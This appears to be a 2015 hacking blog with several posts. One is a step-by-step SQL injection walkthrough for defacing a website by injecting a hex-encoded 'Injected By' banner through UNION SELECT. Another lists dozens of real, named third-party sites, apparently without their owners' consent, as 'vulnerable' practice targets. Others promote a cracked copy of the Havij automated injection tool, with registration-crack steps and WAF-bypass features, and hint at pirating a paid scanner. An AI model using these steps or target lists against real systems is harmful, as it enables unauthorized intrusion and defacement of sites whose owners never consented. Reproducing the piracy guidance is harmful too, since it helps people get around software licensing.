Tuesday, October 27, 2015

How to Print your name on screen Sqli Injection!

Welcome Back to TechynHacky. :-)

I'm Asman and today I'm gonna show you "how to print your name on screen Sqli Injection" some time we need to write your name on screen to show we injected this website. anyway i hope you know about this :D
So lets start :v


2.Vulnerable Website. :-)
3.Basic Knowledge of course :-P

For Example:
Here I have one. :-)


Step 1:
we need to check that the site,we chose vulnerable or not.
To check we need to put ' at the end of the website.
Like This,


if you got any sqli error its mean this website is vulnerable so we can inject this :)
As we chose a SQLi Vulnerable site so We surely will get error. :-D

But now topic is how to print your name on screen!

Step 2:

now we need to find order number for this using this command [order by 1--+-   ]
Like this--

http://www.vul-site.com/events/event-detail.php?id=123 order by 1--+-  (no error)

http://www.vul-site.com/events/event-detail.php?id=123 order by 2--+-  (no error)

http://www.vul-site.com/events/event-detail.php?id=123 order by 10 (error)

its mean it have 9 orders. :-)

Step 3:

now replace order and go to UNION BASED and select UNION STATEMENT and enter order number.
For ex:

http://www.vul-site.com/events/event-detail.php?id=123 union all select 1,2,3,4,5,6,7,8,9,10 --+-

Now we will get vulnerable table.

Step 4:Suppose table number is 3 .

5. Now in url,replace 3 number and write some html code like this--

<font color="red" size="10"> Injected By 'Därk Légènd' </font>

Now copy this code and replace 'Därk Légènd' with your own cyber name and put it in.
Step 6: Now select all html code and go to => Encoding => HexEncoding => String to 00f00 first option.

when you are converting html code in to hexEncoding then put 0x before html code.

If you are using Phone or something which don't have hackbar.
Then use online tools or App/software to convert your html code to HexCoding. :-)

Step 7: Click Execute then yourname is printed there :-)

Hope you liked this :-)
Thanks for visiting and reading.. :-)

Wednesday, October 21, 2015

Some Sqli vulnerable website For your Practice by Darky!

Today I'm gonna tell you about some SQLi Vulnerable Site!!

Here is The 500+ Fresh SQLi Vulnerable Websites List for Practice.These sites will Help You to increase Your Skills in SQLi. :-)

http://www.smelisting.net/corner_category.php? id=15

http://www.psukhabar.com/ReadArticle.php? id=1128&table=whispers

http://www.psukhabar.com/ReadArticle.php? id=1126&table=whispers

http://www.psukhabar.com/ReadArticle.php? id=1128&table=whispers

http://www.psukhabar.com/ReadArticle.php? id=1126&table=whispers

http://www.sumava-zadov.cz/fotogalerie.php? id=9

http://geca.ac.in/departments/department.php? id=5

http://www.sandeeonline.com/ content_disp.php?id=8&cntid=36 http://deepalichains.com/product.php?id=4

http://infozee.com/tests/gre/prep-classes/ contactgre.php?id=infoedstar@gmail.com

http://www.goaunlimited.com/ display_hotels.php?id=107

http://www.sandeeonline.net/content_disp.php? id=1&cntid=50

http://www.iampl.co.in/welfare-and- celebrations.php?id=4






http://www.cimsmeerut.com/ coursehomelist.php?id=4

http://www.sandeeonline.com/ content_disp.php?id=8&cntid=36


http://infozee.com/tests/gre/prep-classes/ contactgre.php?id=infoedstar@gmail.com


http://www.goaunlimited.com/ display_hotels.php?id=107

http://www.sandeeonline.net/content_disp.php? id=1&cntid=50

http://www.iampl.co.in/welfare-and- celebrations.php?id=4

http://www.deepalichains.com/collection.php? id=1

http://www.fairwayshipping.co.in/ certification.php?id=3

http://www.fairwayshipping.co.in/ certification.php?id=2

http://www.guardianangel.in/ga/ guardian_angel_contact_profile_disp2.php? id=1442 http://kamaxi.ca/ jobdescription_manpower_recruitment_agency_ canada.php?id=80

http://infozee.com/tests/gre/prep-classes/ contactgre.php?id=infoedstar@gmail.com


http://www.goaunlimited.com/ display_hotels.php?id=107

http://www.sandeeonline.net/content_disp.php? id=1&cntid=50

http://www.iampl.co.in/welfare-and- celebrations.php?id=4

http://www.deepalichains.com/collection.php? id=1

http://www.fairwayshipping.co.in/ certification.php?id=3

http://www.fairwayshipping.co.in/ certification.php?id=2

http://www.guardianangel.in/ga/ guardian_angel_contact_profile_disp2.php? id=1442

http://kamaxi.ca/ jobdescription_manpower_recruitment_agency_ canada.php?id=80aaaaaaaaaaaaa



http://www.newcairoportal.com/details.php? id=137

http://www.geca.ac.in/departments/ achivement.php?id=1

http://www.harmanindia.com/products- details.php?id=163&cats=Nail%20Polish%20 Bottle%20Caps

http://www.harmanindia.com/products- details.php?id=163&cats=Nail%20Polish%20 Bottle%20Caps

http://www.strechysimon.cz/zakazka.php?id=5 http://teamaero.pjz.cz/aktuality.php?id=193

http://www.sumava-zadov.cz/fotogalerie.php? id=22


http://www.stavebni-prace-plzen.cz/pdf.php? id=9


http://www.sumava-zadov.cz/fotogalerie.php? id=9



http://waytogonatural.com/product_detail.php? ID=45



http://waytogonatural.com/product_detail.php? ID=60

http://www.eriejeeppeople.com/ejpforums/ index.php?showtopic=13404 http://www.pennapalsa.org/wp-content/plugins/ download-monitor/download.php?id=23 1

http://kosh.erichshall.com/forum/index.php? topic=114.0

http://lizzieandrewborden.com/LBForum/ viewtopic.php?t=5320



http://www.byyourcommand.net/cylonforum/ viewtopic.php?f=18&t=1197


http://waytogonatural.com/product_detail.php? ID=45


http://www.mcscom.us/index.php?id=47 http://waytogonatural.com/product_detail.php? ID=60

http://www.eriejeeppeople.com/ejpforums/ index.php?showtopic=13404

http://www.pennapalsa.org/wp-content/plugins/ download-monitor/download.php?id=23 1

http://kosh.erichshall.com/forum/index.php? topic=114.0

http://lizzieandrewborden.com/LBForum/ viewtopic.php?t=5320



http://www.byyourcommand.net/cylonforum/ viewtopic.php?f=18&t=1197

http://waytogonatural.com/product_detail.php? ID=60

http://www.eriejeeppeople.com/ejpforums/ index.php?showtopic=13404

http://www.pennapalsa.org/wp-content/plugins/ download-monitor/download.php?id=23 1

http://kosh.erichshall.com/forum/index.php? topic=114.0

http://lizzieandrewborden.com/LBForum/ viewtopic.php?t=5320



http://www.byyourcommand.net/cylonforum/ viewtopic.php?f=18&t=1197

http://www.rajahmundry.co.in/videoplay.php? id=3

http://www.ontimeengineeringenterprises.com/ singleproduct.php?id=1

http://www.rajahmundry.co.in/viewgallery.php? id=118




http://person.org.in/page.php?id=7:privacy- policy http://atspromoters.com/project.php?id=1



http://www.blackkingdom.in/ software_details.php?id=1

http://www.rajahmundry.co.in/videoplay.php? id=3

http://www.ontimeengineeringenterprises.com/ singleproduct.php?id=1

http://www.rajahmundry.co.in/viewgallery.php? id=118




http://person.org.in/page.php?id=7:privacy- policy




http://www.blackkingdom.in/ software_details.php?id=1

;-) enjoy :-)
Hacking with 'Därk Légènd' :-)

Monday, October 19, 2015

Tor Project:All Versions Download.

Some of you may know that You are tracked by ; The NSA, Cloudflare, Google, Twitter, Facebook and many others.

For total privacy visit using the Tor Network !!

Be Anonymous because In this world you can trust No one!! :-)

So just be the Ghost of Internet ;-)

For Downloading TOR Project,all version!
                   VISIT HERE!!

Thanks :-)

Download Acunetix Web Vulnerability Scanner For Professional!!

Acunetix Web Vulnerability Scanner provides a comprehensive environment to automatically scan a website for vulnerabilities.
It scans the web application as well as the web server.
Once Acunetix identifies the vulnerabilities in the website, you can go ahead and exploit it manually or use any of the other tools in this list.

Acunetix is however, a paid software, but if you are resourceful,you will know where to get it for free.


After Sucessfully vist ti Acunetix Websir subscribe with your Email And Start Downloading!! :-)

If you Do not subscribed with your own Email Then You Are Not Able to download Acunetix vulnerable software.

Thanks For Reading :-)

For any kinda help contact me or comment below!! :-)

Download Havij v 1.15 Pro | Advanced Automated SQL Injection + license by Asman Mirza

----------How to Use!----------

This tool is for exploiting SQL Injection bugs in web application.
For using this tool you should know a little about SQL Injections.
Enter target url and select http method then click Analyze.

Note: Try to url be valid input that returns a normal page not a 404 or error page.

---------;What's New?----------

Version 1.15
2011/06/08 -Webknight WAF bypass added.
-Bypassing mod_security made better
-Unicode support added
-A new method for tables/columns extraction in mssql
-Continuing previous tables/columns extraction made available
-Custom replacement added to the settings
-Default injection value added to the settings (when using %Inject_Here%)
-Table and column prefix added for blind injections
-Custom table and column list added.
-Custom time out added.
-A new md5 cracker site added
-bugfix: a bug releating to SELECT command
-bugfix: finding string column
-bugfix: getting multi column data in mssql
-bugfix: finding mysql column count
-bugfix: wrong syntax in injection string type in MsAccess
-bugfix: false positive results was removed
-bugfix: data extraction in url
-encoded pages
-bugfix: loading saved projects
-bugfix: some errors in data extraction in mssql fixed.
-bugfix: a bug in MsAccess when guessing tables and columns
-bugfix: a bug when using proxy
-bugfix: enabling remote desktop bug in windows server 2008 (thanks to pegasus315)
-bugfix: false positive in finding columns count
-bugfix: when mssql error based method failed
-bugfix: a bug in saving data
-bugfix: Oracle and PostgreSQL detection


1.Run Havij.exe

2. Once it opens you will see register..

3. Click Register Make sure you are connected to the internet

4. Under Name: You write: Cracked@By.Exidous

5. Under File: You select the folder where you are currently running the Havij program from and select Havij Key

6. Done!!! :-)